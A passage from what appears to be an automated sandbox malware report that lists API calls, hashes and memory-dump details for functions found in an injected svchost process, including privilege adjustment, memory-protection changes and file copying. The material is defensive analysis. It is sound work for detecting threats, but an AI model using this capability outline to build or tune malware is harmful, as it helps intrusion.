Instruction Fuzzy Hash: A8116376944221AFDB214F60EC48F6BBB68FB4A6A1F404959FE42D7190DB30C521DBA1

Uniqueness

Uniqueness Score: -1.00%

Function 02B14068 Relevance: 12.1, APIs: 8, Instructions: 63
memoryfileCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

GetProcessHeap.KERNEL32(00000008,00000009,?,02B1373D,?,00100000,00000006,?), ref: 02B1406D
RtlAllocateHeap.NTDLL(00000000,?,02B1373D), ref: 02B14074
CreateFileMappingW.KERNELBASE(000000FF,02B162B8,00000004,00000000,?,?,?,?,?,02B1373D,?,00100000,00000006,?), ref: 02B1409B
GetLastError.KERNEL32(?,?,?,02B1373D,?,00100000,00000006,?), ref: 02B140A7
MapViewOfFile.KERNELBASE(00000000,000F001F,00000000,00000000,?,?,?,?,02B1373D,?,00100000,00000006,?), ref: 02B140C6
CloseHandle.KERNEL32(00000000,?,?,?,02B1373D,?,00100000,00000006,?), ref: 02B140D5
GetProcessHeap.KERNEL32(00000000,00000000,?,?,?,02B1373D,?,00100000,00000006,?), ref: 02B140DE
HeapFree.KERNEL32(00000000,?,?,?,02B1373D,?,00100000,00000006,?), ref: 02B140E5

Memory Dump Source

Source File: 0000001A.00000002.3295811054.0000000002B11000.00000020.00000400.00020000.00000000.sdmp, Offset: 02B11000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_26_2_2b11000_svchost.jbxd

Yara matches

Similarity

API ID: Heap$FileProcess$AllocateCloseCreateErrorFreeHandleLastMappingView
String ID:
API String ID: 3951456143-0
Opcode ID: 37e365e94727856e32c9f153062eee1babef239c877172b25cea32325075737a
Instruction ID: 0bd45b12513d5ca824218d8cf2da892510c8090480c0ebf8c8f38a4d432d6b7a
Opcode Fuzzy Hash: 37e365e94727856e32c9f153062eee1babef239c877172b25cea32325075737a
Instruction Fuzzy Hash: 05118F75684302AFD7208FA8EC4CF16BBE8EF08751F518868FA95DB291DB70D8609B50

Uniqueness

Uniqueness Score: -1.00%

Function 02B11FE9 Relevance: 6.0, APIs: 4, Instructions: 30
threadCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

CreateEventW.KERNEL32(00000000,00000000,00000000,00000000), ref: 02B11FF0
CreateThread.KERNELBASE(00000000,00000000,Function_00001482,00000000,00000000,00000000), ref: 02B12009
FindCloseChangeNotification.KERNELBASE(00000000), ref: 02B12014
CloseHandle.KERNEL32 ref: 02B12025

Memory Dump Source

Source File: 0000001A.00000002.3295811054.0000000002B11000.00000020.00000400.00020000.00000000.sdmp, Offset: 02B11000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_26_2_2b11000_svchost.jbxd

Yara matches

Similarity

API ID: CloseCreate$ChangeEventFindHandleNotificationThread
String ID:
API String ID: 3181087867-0
Opcode ID: 5811a532237f803de9d443478c4baa930041691a3a0a3ed52aa294082b2eb828
Instruction ID: c021d700c98bbe5c25583b9db92a610889c840ca11966ca01d0e1a2128b897cb
Opcode Fuzzy Hash: 5811a532237f803de9d443478c4baa930041691a3a0a3ed52aa294082b2eb828
Instruction Fuzzy Hash: 80E01A30982231AA97312B767C0DDC77E5DEF0A2E53814951B80DC3108DB208561D5F0

Uniqueness

Uniqueness Score: -1.00%

Function 02B126ED Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 70
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

memset.MSVCRT ref: 02B12709
RtlGetVersion.NTDLL(?), ref: 02B1271E

Part of subcall function 02B13641: GetNativeSystemInfo.KERNELBASE(?,?,0000011C,?,?,?,?,?,?,?,?,02B12790), ref: 02B13659

Strings

f<v, xrefs: 02B127BD

Memory Dump Source

Source File: 0000001A.00000002.3295811054.0000000002B11000.00000020.00000400.00020000.00000000.sdmp, Offset: 02B11000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_26_2_2b11000_svchost.jbxd

Yara matches

Similarity

API ID: InfoNativeSystemVersionmemset
String ID: f<v
API String ID: 487673674-2911902482
Opcode ID: 05eb258ce4713c429ad61f8b4abb002744cd32a49734915812c7917b575d12ae
Instruction ID: 472cf069be4c58a9aa1dec8ed5f55e0c805374ef6293eb77a1408ee39af8261c
Opcode Fuzzy Hash: 05eb258ce4713c429ad61f8b4abb002744cd32a49734915812c7917b575d12ae
Instruction Fuzzy Hash: 6421D436C892BC9AD7199BB468056D77FAC9F66390FC408D5D9C4D3202E6240D6DCBF1

Uniqueness

Uniqueness Score: -1.00%

Function 02B1492A Relevance: 5.1, APIs: 4, Instructions: 62
memoryCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

GetProcessHeap.KERNEL32(00000000,?,?,00000000,00000000,02B170E8), ref: 02B14982
HeapFree.KERNEL32(00000000,?,00000000,00000000,02B170E8), ref: 02B14989
GetProcessHeap.KERNEL32(00000000,00000000,?,00000000,00000000,02B170E8), ref: 02B149B1
HeapFree.KERNEL32(00000000,?,00000000,00000000,02B170E8), ref: 02B149B8

Memory Dump Source

Source File: 0000001A.00000002.3295811054.0000000002B11000.00000020.00000400.00020000.00000000.sdmp, Offset: 02B11000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_26_2_2b11000_svchost.jbxd

Yara matches

Similarity

API ID: Heap$FreeProcess
String ID:
API String ID: 3859560861-0
Opcode ID: 6e65af99a648e53593c567c92efe2a9c26de1392dafde3e4b2cb005cfe0b7e9a
Instruction ID: caac6dcb79a4260cece5b06a5eefb05c51f9f04a00585b1198b3f2379c6e4639
Opcode Fuzzy Hash: 6e65af99a648e53593c567c92efe2a9c26de1392dafde3e4b2cb005cfe0b7e9a
Instruction Fuzzy Hash: E511CE76944208AFDB10DBA4D808BEEF7BCFB48395F94459AEE44D7148EB309614DBE0

Uniqueness

Uniqueness Score: -1.00%

Function 02B12C33 Relevance: 4.6, APIs: 3, Instructions: 74
stringCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

StrStrIW.KERNELBASE(02B163B4,?), ref: 02B12C67

Part of subcall function 02B155BC: SHGetFolderPathW.SHELL32(00000000,00000023,00000000,00000000,?), ref: 02B155D3
Part of subcall function 02B155BC: CreateDirectoryW.KERNELBASE(?,02B162B8), ref: 02B1561C

Part of subcall function 02B12D40: GetProcessHeap.KERNEL32(00000000,00000000), ref: 02B12D86
Part of subcall function 02B12D40: RtlFreeHeap.NTDLL(00000000), ref: 02B12D8D

lstrcpyW.KERNEL32(02B163B4,?), ref: 02B12CC7
lstrcatW.KERNEL32(?,02B1738C), ref: 02B12CD9

Memory Dump Source

Source File: 0000001A.00000002.3295811054.0000000002B11000.00000020.00000400.00020000.00000000.sdmp, Offset: 02B11000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_26_2_2b11000_svchost.jbxd

Yara matches

Similarity

API ID: Heap$CreateDirectoryFolderFreePathProcesslstrcatlstrcpy
String ID:
API String ID: 2199617466-0
Opcode ID: 9e640b9916ec19fd632365850f8f8b8a92cecbc3fab6e38043cfdc4601a9c6de
Instruction ID: 9fef7ab2f3841869c5cf629db5986658d8df2e272b019af7ae4f199ceb2e53df
Opcode Fuzzy Hash: 9e640b9916ec19fd632365850f8f8b8a92cecbc3fab6e38043cfdc4601a9c6de
Instruction Fuzzy Hash: 4221F9B29402189FEB20DFA4DC49BDA77BCEB04344F8404A6F949D3151EB349694CF61

Uniqueness

Uniqueness Score: -1.00%

Function 02B12833 Relevance: 4.6, APIs: 3, Instructions: 73
timeCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

GetComputerNameExW.KERNELBASE(00000000,?,?,?,00000005), ref: 02B12858
LookupAccountNameW.ADVAPI32(00000000,?,?,?,?,?,?), ref: 02B1287E
GetSystemTimeAsFileTime.KERNEL32(?,?,00000005), ref: 02B128A3

Memory Dump Source

Source File: 0000001A.00000002.3295811054.0000000002B11000.00000020.00000400.00020000.00000000.sdmp, Offset: 02B11000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_26_2_2b11000_svchost.jbxd

Yara matches

Similarity

API ID: NameTime$AccountComputerFileLookupSystem
String ID:
API String ID: 3076100934-0
Opcode ID: dbbdb4253bf84cddf494a96eb7137e8f3c82eaf8a80f0d17089ba01f18875972
Instruction ID: 9fbf8720e27292b52293175e27d75bcf0c8904da5633e84b0b20fdb8284df441
Opcode Fuzzy Hash: dbbdb4253bf84cddf494a96eb7137e8f3c82eaf8a80f0d17089ba01f18875972
Instruction Fuzzy Hash: DC215C729412589FDB29CF25E8849DB7BACEF45294B800226FC55D3242D730D91ACB90

Uniqueness

Uniqueness Score: -1.00%

Function 02B15108 Relevance: 4.6, APIs: 3, Instructions: 52
fileCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

Part of subcall function 02B154AC: SHGetFolderPathW.SHELL32(00000000,00000023,00000000,00000000,00000000,00000000,00000000,?), ref: 02B154C0
Part of subcall function 02B154AC: CreateDirectoryW.KERNELBASE(00000000,02B162B8), ref: 02B15500

CreateFileW.KERNELBASE(?,80000000,00000003,00000000,00000003,00000080,00000000), ref: 02B1513A
ReadFile.KERNEL32(00000000,?,00000004,?,00000000), ref: 02B1515E
CloseHandle.KERNEL32(00000000), ref: 02B15167

Memory Dump Source

Source File: 0000001A.00000002.3295811054.0000000002B11000.00000020.00000400.00020000.00000000.sdmp, Offset: 02B11000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_26_2_2b11000_svchost.jbxd

Yara matches

Similarity

API ID: CreateFile$CloseDirectoryFolderHandlePathRead
String ID:
API String ID: 221032062-0
Opcode ID: 457a6b3d7050fe41a38c2520187164673fc62193e608c1366a6826ee8128d07d
Instruction ID: 3432de2c7a2ab14ad95b846463342e8bbbdf35074c7355b78d29a11aad1cf91c
Opcode Fuzzy Hash: 457a6b3d7050fe41a38c2520187164673fc62193e608c1366a6826ee8128d07d
Instruction Fuzzy Hash: 09012632A48308BFE3319A60EC4CF6BB79CE7C57A4FD04A29FA51C3080E731A5148761

Uniqueness

Uniqueness Score: -1.00%

Function 02B12EBA Relevance: 4.5, APIs: 3, Instructions: 45
fileCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

CreateFileW.KERNELBASE(?,40000000,00000003,00000000,00000002,00000080,00000000,?,?,?,?,02B12D76,?,?,?,?), ref: 02B12ED5
WriteFile.KERNELBASE(00000000,?,?,?,00000000,?,?,?,?,?,02B12D76,?,?,?,?,?), ref: 02B12EF4
CloseHandle.KERNEL32(00000000,?,?,?,?,?,02B12D76,?,?,?,?,?), ref: 02B12EFD

Memory Dump Source

Source File: 0000001A.00000002.3295811054.0000000002B11000.00000020.00000400.00020000.00000000.sdmp, Offset: 02B11000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_26_2_2b11000_svchost.jbxd

Yara matches

Similarity

API ID: File$CloseCreateHandleWrite
String ID:
API String ID: 1065093856-0
Opcode ID: 5a5ed7cd305e5a99ff8ff741bed758a7abf93f3bfef186b4feb504c1b055c4f3
Instruction ID: c21cfeaf0aeb3f7464853b3efb53522a44272aa999a0898ffb7399c7a1657539
Opcode Fuzzy Hash: 5a5ed7cd305e5a99ff8ff741bed758a7abf93f3bfef186b4feb504c1b055c4f3
Instruction Fuzzy Hash: 12F09632945228FFDB305A75AC48FABBB6CEB456B4F804665FD15D3180D730591196F0

Uniqueness

Uniqueness Score: -1.00%

Function 02B12D40 Relevance: 4.5, APIs: 3, Instructions: 43
memoryfileCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

Part of subcall function 02B12DAF: CreateFileW.KERNELBASE(00000000,80000000,00000003,00000000,00000003,00000080,00000000,00000000,00000000,?,02B151B9,?,02B170E8,00000000,00000000,?), ref: 02B12DC8

CopyFileW.KERNEL32(?,?,00000000), ref: 02B12DA5

Part of subcall function 02B12EBA: CreateFileW.KERNELBASE(?,40000000,00000003,00000000,00000002,00000080,00000000,?,?,?,?,02B12D76,?,?,?,?), ref: 02B12ED5

GetProcessHeap.KERNEL32(00000000,00000000), ref: 02B12D86
RtlFreeHeap.NTDLL(00000000), ref: 02B12D8D

Memory Dump Source

Source File: 0000001A.00000002.3295811054.0000000002B11000.00000020.00000400.00020000.00000000.sdmp, Offset: 02B11000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_26_2_2b11000_svchost.jbxd

Yara matches

Similarity

API ID: File$CreateHeap$CopyFreeProcess
String ID:
API String ID: 2735472767-0
Opcode ID: 25f7d21207122d6902364da5e9b0fff74b24d62f2e93edfedee80ffe5ee1508f
Instruction ID: a2dd5f7fb8099820a089411300fa1119bfd8d2745cac9949cdec5ed539fa1e40
Opcode Fuzzy Hash: 25f7d21207122d6902364da5e9b0fff74b24d62f2e93edfedee80ffe5ee1508f
Instruction Fuzzy Hash: 8201EC76840118BBDF11AF90DC09E9DBB79EB04751F5045A1BD09A6164E7328A60AB90

Uniqueness

Uniqueness Score: -1.00%

Function 02B12674 Relevance: 4.5, APIs: 3, Instructions: 32
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

SetErrorMode.KERNELBASE(00008007), ref: 02B12679

Part of subcall function 02B12973: lstrcpyW.KERNEL32(02B162F2,02B163B4), ref: 02B1298C
Part of subcall function 02B12973: lstrcatW.KERNEL32(02B162F0,02B17338), ref: 02B1299C
Part of subcall function 02B12973: SetUnhandledExceptionFilter.KERNEL32(Function_000017E8), ref: 02B129A7

Part of subcall function 02B126ED: memset.MSVCRT ref: 02B12709
Part of subcall function 02B126ED: RtlGetVersion.NTDLL(?), ref: 02B1271E

Part of subcall function 02B13555: OpenProcessToken.ADVAPI32(000000FF,00000008,00000000), ref: 02B13570
Part of subcall function 02B13555: GetTokenInformation.KERNELBASE(00000000,00000001(TokenIntegrityLevel),00000000,00000000,00000000), ref: 02B13585
Part of subcall function 02B13555: GetLastError.KERNEL32 ref: 02B1358B
Part of subcall function 02B13555: GetProcessHeap.KERNEL32(00000008,00000001), ref: 02B135A1
Part of subcall function 02B13555: RtlAllocateHeap.NTDLL(00000000), ref: 02B135A8
Part of subcall function 02B13555: GetTokenInformation.KERNELBASE(00000000,00000001(TokenIntegrityLevel),00000000,00000000,00000000), ref: 02B135C1
Part of subcall function 02B13555: GetSidSubAuthority.ADVAPI32(00000000,00000000), ref: 02B135CF
Part of subcall function 02B13555: FindCloseChangeNotification.KERNELBASE(00000000), ref: 02B135F0
Part of subcall function 02B13555: GetProcessHeap.KERNEL32(00000000,00000000), ref: 02B135FD
Part of subcall function 02B13555: HeapFree.KERNEL32(00000000), ref: 02B13604

ExitProcess.KERNEL32 ref: 02B126E6

Part of subcall function 02B125E3: lstrcpyW.KERNEL32(?,02B17328), ref: 02B125F6
Part of subcall function 02B125E3: CreateEventW.KERNEL32(00000000,00000000,00000000,?), ref: 02B12612
Part of subcall function 02B125E3: CreateEventW.KERNEL32(00000000,00000000,00000000,?), ref: 02B12623
Part of subcall function 02B125E3: GetLastError.KERNEL32 ref: 02B1262D

Part of subcall function 02B12C33: StrStrIW.KERNELBASE(02B163B4,?), ref: 02B12C67

Part of subcall function 02B11BB9: GetProcessHeap.KERNEL32(00000000,00000000), ref: 02B11BFF
Part of subcall function 02B11BB9: HeapFree.KERNEL32(00000000), ref: 02B11C06

Part of subcall function 02B11FE9: CreateEventW.KERNEL32(00000000,00000000,00000000,00000000), ref: 02B11FF0
Part of subcall function 02B11FE9: CreateThread.KERNELBASE(00000000,00000000,Function_00001482,00000000,00000000,00000000), ref: 02B12009
Part of subcall function 02B11FE9: FindCloseChangeNotification.KERNELBASE(00000000), ref: 02B12014

Memory Dump Source

Source File: 0000001A.00000002.3295811054.0000000002B11000.00000020.00000400.00020000.00000000.sdmp, Offset: 02B11000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_26_2_2b11000_svchost.jbxd

Yara matches

Similarity

API ID: Heap$Process$Create$ErrorEventToken$ChangeCloseFindFreeInformationLastNotificationlstrcpy$AllocateAuthorityExceptionExitFilterModeOpenThreadUnhandledVersionlstrcatmemset
String ID:
API String ID: 179549865-0
Opcode ID: 998048f27bafa7b72b4bfcc5a247286770d85a9f9048385ff6eb370d07ae29d6
Instruction ID: b568bdaefdbcf344c62e803ffb677681e771d983d54fcc18f4746c418dadc46f
Opcode Fuzzy Hash: 998048f27bafa7b72b4bfcc5a247286770d85a9f9048385ff6eb370d07ae29d6
Instruction Fuzzy Hash: 3EF0ED706903629EEB0077F9DD0AB1E266A9F10386FC548F0AE49D61D9EF1498605D36

Uniqueness

Uniqueness Score: -1.00%

Function 02B129F5 Relevance: 3.1, APIs: 2, Instructions: 147
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

Memory Dump Source

Source File: 0000001A.00000002.3295811054.0000000002B11000.00000020.00000400.00020000.00000000.sdmp, Offset: 02B11000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_26_2_2b11000_svchost.jbxd

Yara matches

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 05dde4b8c751d3aae52a7e3983e7217f9e5b9fe4974e96b0d99cdefb2d86ce2b
Instruction ID: 954ddfab99c89d51df4d9cdb3b5626ba97e99ef26bbe43742421e37f259bd2ea
Opcode Fuzzy Hash: 05dde4b8c751d3aae52a7e3983e7217f9e5b9fe4974e96b0d99cdefb2d86ce2b
Instruction Fuzzy Hash: 365177766583129FE318CF28D851AA7B3E8FF88214F9648ADF856CB250E730E904CB51

Uniqueness

Uniqueness Score: -1.00%

Function 02B154AC Relevance: 3.1, APIs: 2, Instructions: 83
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

SHGetFolderPathW.SHELL32(00000000,00000023,00000000,00000000,00000000,00000000,00000000,?), ref: 02B154C0
CreateDirectoryW.KERNELBASE(00000000,02B162B8), ref: 02B15500

Memory Dump Source

Source File: 0000001A.00000002.3295811054.0000000002B11000.00000020.00000400.00020000.00000000.sdmp, Offset: 02B11000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_26_2_2b11000_svchost.jbxd

Yara matches

Similarity

API ID: CreateDirectoryFolderPath
String ID:
API String ID: 3690537876-0
Opcode ID: 67a95300cd0beac48f894d75b5605675ff546997f99d5e40670c3796bb5785bf
Instruction ID: 6a9e4259a92031e1af1a5db1c3cc18c69cbf0978522864c55cec9831c67f4656
Opcode Fuzzy Hash: 67a95300cd0beac48f894d75b5605675ff546997f99d5e40670c3796bb5785bf
Instruction Fuzzy Hash: 3411C8A6A402187EF710A6A19C45DFFBBBCDF85A50F50009BF904D7140EA289A46EBB1

Uniqueness

Uniqueness Score: -1.00%

Function 02B155BC Relevance: 3.1, APIs: 2, Instructions: 63COMMON

Download Yara Rule

APIs

SHGetFolderPathW.SHELL32(00000000,00000023,00000000,00000000,?), ref: 02B155D3
CreateDirectoryW.KERNELBASE(?,02B162B8), ref: 02B1561C

Memory Dump Source

Source File: 0000001A.00000002.3295811054.0000000002B11000.00000020.00000400.00020000.00000000.sdmp, Offset: 02B11000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_26_2_2b11000_svchost.jbxd

Yara matches

Similarity

API ID: CreateDirectoryFolderPath
String ID:
API String ID: 3690537876-0
Opcode ID: d21f94ddd332282646d9f2e4da8a9c4d701c40be032cd4249342aecd303a33b9
Instruction ID: 7387675d5284855934ec13bef8768bbd58050d63a607a19169b3876fa6967ac3
Opcode Fuzzy Hash: d21f94ddd332282646d9f2e4da8a9c4d701c40be032cd4249342aecd303a33b9
Instruction Fuzzy Hash: 1F01B972A402187EF71066A5EC89D7FBB7CEB85A54B90005BF905D3140EE64690096B1

Uniqueness

Uniqueness Score: -1.00%

Function 02B11BB9 Relevance: 2.5, APIs: 2, Instructions: 34memoryCOMMON

Download Yara Rule

APIs

GetProcessHeap.KERNEL32(00000000,00000000), ref: 02B11BFF
HeapFree.KERNEL32(00000000), ref: 02B11C06

Memory Dump Source

Source File: 0000001A.00000002.3295811054.0000000002B11000.00000020.00000400.00020000.00000000.sdmp, Offset: 02B11000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_26_2_2b11000_svchost.jbxd

Yara matches

Similarity

API ID: Heap$FreeProcess
String ID:
API String ID: 3859560861-0
Opcode ID: bbc324991b94610a22a566395879ae50c1f90643dfaef5300b8edf0a65de8566
Instruction ID: 4cf4bdb8c10164f3454fabc9cb1e4869fa7984390b7ed1e8d978bb625d95fbfd
Opcode Fuzzy Hash: bbc324991b94610a22a566395879ae50c1f90643dfaef5300b8edf0a65de8566
Instruction Fuzzy Hash: 74F03A7AD40208BBDB10EBE8CD05FDEB77CEB04305F9005D1FA14E6180EB719624ABA5

Uniqueness

Uniqueness Score: -1.00%

Function 02B13641 Relevance: 1.5, APIs: 1, Instructions: 22COMMON

Download Yara Rule

APIs

GetNativeSystemInfo.KERNELBASE(?,?,0000011C,?,?,?,?,?,?,?,?,02B12790), ref: 02B13659

Memory Dump Source

Source File: 0000001A.00000002.3295811054.0000000002B11000.00000020.00000400.00020000.00000000.sdmp, Offset: 02B11000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_26_2_2b11000_svchost.jbxd

Yara matches

Similarity

API ID: InfoNativeSystem
String ID:
API String ID: 1721193555-0
Opcode ID: 43d5001e1532eeeaac3e0288bcd80fd7208796430bdd3f7fb1024bbc9a0acf93
Instruction ID: e8f590324eadb0d2f225b174b1b426c5800c33ef33e8b03f77a1e07aeba2204a
Opcode Fuzzy Hash: 43d5001e1532eeeaac3e0288bcd80fd7208796430bdd3f7fb1024bbc9a0acf93
Instruction Fuzzy Hash: 19D0C233A1421C56CB00A6B9A9099CBF7FC9B8C610F1049A6E501E7140E961999442E0

Uniqueness

Uniqueness Score: -1.00%

Function 02B129AE Relevance: 1.3, APIs: 1, Instructions: 22sleepCOMMON

Download Yara Rule

APIs

Part of subcall function 02B12BA4: NtProtectVirtualMemory.NTDLL(000000FF,?,?,00000040,?), ref: 02B12BDA
Part of subcall function 02B12BA4: NtProtectVirtualMemory.NTDLL(000000FF,?,?,?,?), ref: 02B12C23

Sleep.KERNELBASE(000000FF), ref: 02B129E9

Part of subcall function 02B12674: SetErrorMode.KERNELBASE(00008007), ref: 02B12679

Memory Dump Source

Source File: 0000001A.00000002.3295811054.0000000002B11000.00000020.00000400.00020000.00000000.sdmp, Offset: 02B11000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_26_2_2b11000_svchost.jbxd

Yara matches

Similarity

API ID: MemoryProtectVirtual$ErrorModeSleep
String ID:
API String ID: 46048798-0
Opcode ID: aecb5bd50cdf588eea6344e6b35fc1fbc0794206019a18575e9f6800212d4c77
Instruction ID: cba5e0ea0dd753071bd7360240737da7c36cc08d6093e8699912e8b1a86d10b1
Opcode Fuzzy Hash: aecb5bd50cdf588eea6344e6b35fc1fbc0794206019a18575e9f6800212d4c77
Instruction Fuzzy Hash: 36E01231D101318FD754A7BC9809B9937A4AF08390F8606F1AE21CB198D7208890DB50

Uniqueness

Uniqueness Score: -1.00%

Non-executed Functions

Function 02B13E7E Relevance: 12.1, APIs: 8, Instructions: 70encryptionCOMMON

Download Yara Rule

APIs

CryptAcquireContextW.ADVAPI32(?,00000000,02B173C8,00000001,F0000000,00000094,?), ref: 02B13EA1
CryptCreateHash.ADVAPI32(?,00008003,00000000,00000000,?,00000001), ref: 02B13EBE
CryptHashData.ADVAPI32(?,?,00000000,00000000), ref: 02B13ED4
CryptImportKey.ADVAPI32(?,00000000,00000094,00000000,00000000,?), ref: 02B13EF1
CryptVerifySignatureA.ADVAPI32(?,00000000,00000080,00000000,00000000,00000000), ref: 02B13F0D
CryptDestroyKey.ADVAPI32(?), ref: 02B13F18
CryptDestroyHash.ADVAPI32(?), ref: 02B13F26
CryptReleaseContext.ADVAPI32(?,00000000), ref: 02B13F30

Memory Dump Source

Source File: 0000001A.00000002.3295811054.0000000002B11000.00000020.00000400.00020000.00000000.sdmp, Offset: 02B11000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_26_2_2b11000_svchost.jbxd

Yara matches

Similarity

API ID: Crypt$Hash$ContextDestroy$AcquireCreateDataImportReleaseSignatureVerify
String ID:
API String ID: 972346567-0
Opcode ID: 11dcace80c0791bf35cfbc947cfa1089ad855713aee29dbf981152959b50b304
Instruction ID: 740a170aefe8af2e8afb470d99c266dabd70f8a52673cce870f220b0b5cac9f9
Opcode Fuzzy Hash: 11dcace80c0791bf35cfbc947cfa1089ad855713aee29dbf981152959b50b304
Instruction Fuzzy Hash: E7210836D40258FBCB229F95DC0CE9EFFB9EB85B41F504595F905A3160DB318A20EB50

Uniqueness

Uniqueness Score: -1.00%

Function 02B12F1A Relevance: 10.6, APIs: 7, Instructions: 71encryptionCOMMON

Download Yara Rule

APIs

CryptAcquireContextW.ADVAPI32(02B17658,00000000,00000000,00000001,F0000000,02B162B0,?,?,?,02B15B88,?,00000000,?,?,02B17658,?), ref: 02B12F35
CryptCreateHash.ADVAPI32(02B17658,00008003,00000000,00000000,?,00000000,?,?,?,02B15B88,?,00000000,?,?,02B17658,?), ref: 02B12F52
CryptHashData.ADVAPI32(?,02B17658,?,00000000,?,?,?,02B15B88,?,00000000,?,?,02B17658,?), ref: 02B12F68
CryptHashData.ADVAPI32(?,?,00000004,00000000,?,?,?,02B15B88,?,00000000,?,?,02B17658,?), ref: 02B12F83
CryptGetHashParam.ADVAPI32(?,00000002,00000000,?,00000000,?,?,?,02B15B88,?,00000000,?), ref: 02B12FA3
CryptDestroyHash.ADVAPI32(?,?,?,?,02B15B88,?,00000000,?,?,02B17658,?), ref: 02B12FB3
CryptReleaseContext.ADVAPI32(02B17658,00000000,?,?,?,02B15B88,?,00000000,?,?,02B17658,?), ref: 02B12FC2

Memory Dump Source

Source File: 0000001A.00000002.3295811054.0000000002B11000.00000020.00000400.00020000.00000000.sdmp, Offset: 02B11000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_26_2_2b11000_svchost.jbxd

Yara matches

Similarity

API ID: Crypt$Hash$ContextData$AcquireCreateDestroyParamRelease
String ID:
API String ID: 276068997-0
Opcode ID: 4be67c10d2219574ef366c133ab885883a1c3084e4cd6190a708e4584429cefb
Instruction ID: ee486a7851ca6cc918c9e0c7714433241854dbcd043e02ede795cf432e5c15d8
Opcode Fuzzy Hash: 4be67c10d2219574ef366c133ab885883a1c3084e4cd6190a708e4584429cefb
Instruction Fuzzy Hash: 68210B7594021DBFEB118F90DD89EAEBB7CEB04695F5145A5FE01A3250DB318E20AB50

Uniqueness

Uniqueness Score: -1.00%

Function 02B139E8 Relevance: 7.5, APIs: 5, Instructions: 41COMMON

Download Yara Rule

APIs

GetCurrentProcess.KERNEL32(00000028,?,?,02B11210,?,02B171F0,?), ref: 02B139F4
OpenProcessToken.ADVAPI32(00000000,?,02B11210,?,02B171F0,?), ref: 02B139FB
LookupPrivilegeValueA.ADVAPI32(00000000,02B171F0,02B11210), ref: 02B13A11
AdjustTokenPrivileges.ADVAPI32(?,00000000,?,00000000,00000000,00000000), ref: 02B13A36
CloseHandle.KERNEL32(?,?,?,?,02B11210,?,02B171F0,?), ref: 02B13A41

Memory Dump Source

Source File: 0000001A.00000002.3295811054.0000000002B11000.00000020.00000400.00020000.00000000.sdmp, Offset: 02B11000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_26_2_2b11000_svchost.jbxd

Yara matches

Similarity

API ID: ProcessToken$AdjustCloseCurrentHandleLookupOpenPrivilegePrivilegesValue
String ID:
API String ID: 3038321057-0
Opcode ID: efc263b31c9fc255264ed3a575a1c5846c4ff0080f38e12b6140173c79ff0d78
Instruction ID: d00040d4ae952e57aba03cbe88188b292327f7d340757123eba259cc9220e9cd
Opcode Fuzzy Hash: efc263b31c9fc255264ed3a575a1c5846c4ff0080f38e12b6140173c79ff0d78
Instruction Fuzzy Hash: 1FF03C76D40118BBDB219B95DD0CEAFBFFDEB89B50F400595BD05E3140DB308A24DAA1

Uniqueness

Uniqueness Score: -1.00%

Function 02B14794 Relevance: 15.1, APIs: 10, Instructions: 143filesleepsynchronizationCOMMON

Download Yara Rule

APIs

Sleep.KERNEL32(00000064), ref: 02B14830
CreateEventW.KERNEL32(02B162B8,00000000,00000000,?), ref: 02B14852
CreateFileMappingW.KERNEL32(000000FF,02B162B8,00000004,00000000,00000000,?), ref: 02B14886
MapViewOfFile.KERNEL32(00000000,000F001F,00000000,00000000,00000000), ref: 02B1489D
SetEvent.KERNEL32(00000000), ref: 02B148D9
WaitForSingleObject.KERNEL32(?,00000BB8), ref: 02B148EC
UnmapViewOfFile.KERNEL32(00000000), ref: 02B148F3
CloseHandle.KERNEL32(?), ref: 02B14903
CloseHandle.KERNEL32(?), ref: 02B14910
CloseHandle.KERNEL32(00000000), ref: 02B14917

Memory Dump Source

Source File: 0000001A.00000002.3295811054.0000000002B11000.00000020.00000400.00020000.00000000.sdmp, Offset: 02B11000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_26_2_2b11000_svchost.jbxd

Yara matches

Similarity

API ID: CloseFileHandle$CreateEventView$MappingObjectSingleSleepUnmapWait
String ID:
API String ID: 3151294157-0
Opcode ID: 9da317d463a986626374d97e410fa879dcf733b7dab96f79713dd2742976fae1
Instruction ID: 974616545ebbeb63d0c44268ac18025872aa5fdc2f42aa74216e7950a100ba43
Opcode Fuzzy Hash: 9da317d463a986626374d97e410fa879dcf733b7dab96f79713dd2742976fae1
Instruction Fuzzy Hash: 2241E332648381AFD3219F549C49FABBBA9EF857A0F80085DF688C7185DB70D455C7A2

Uniqueness

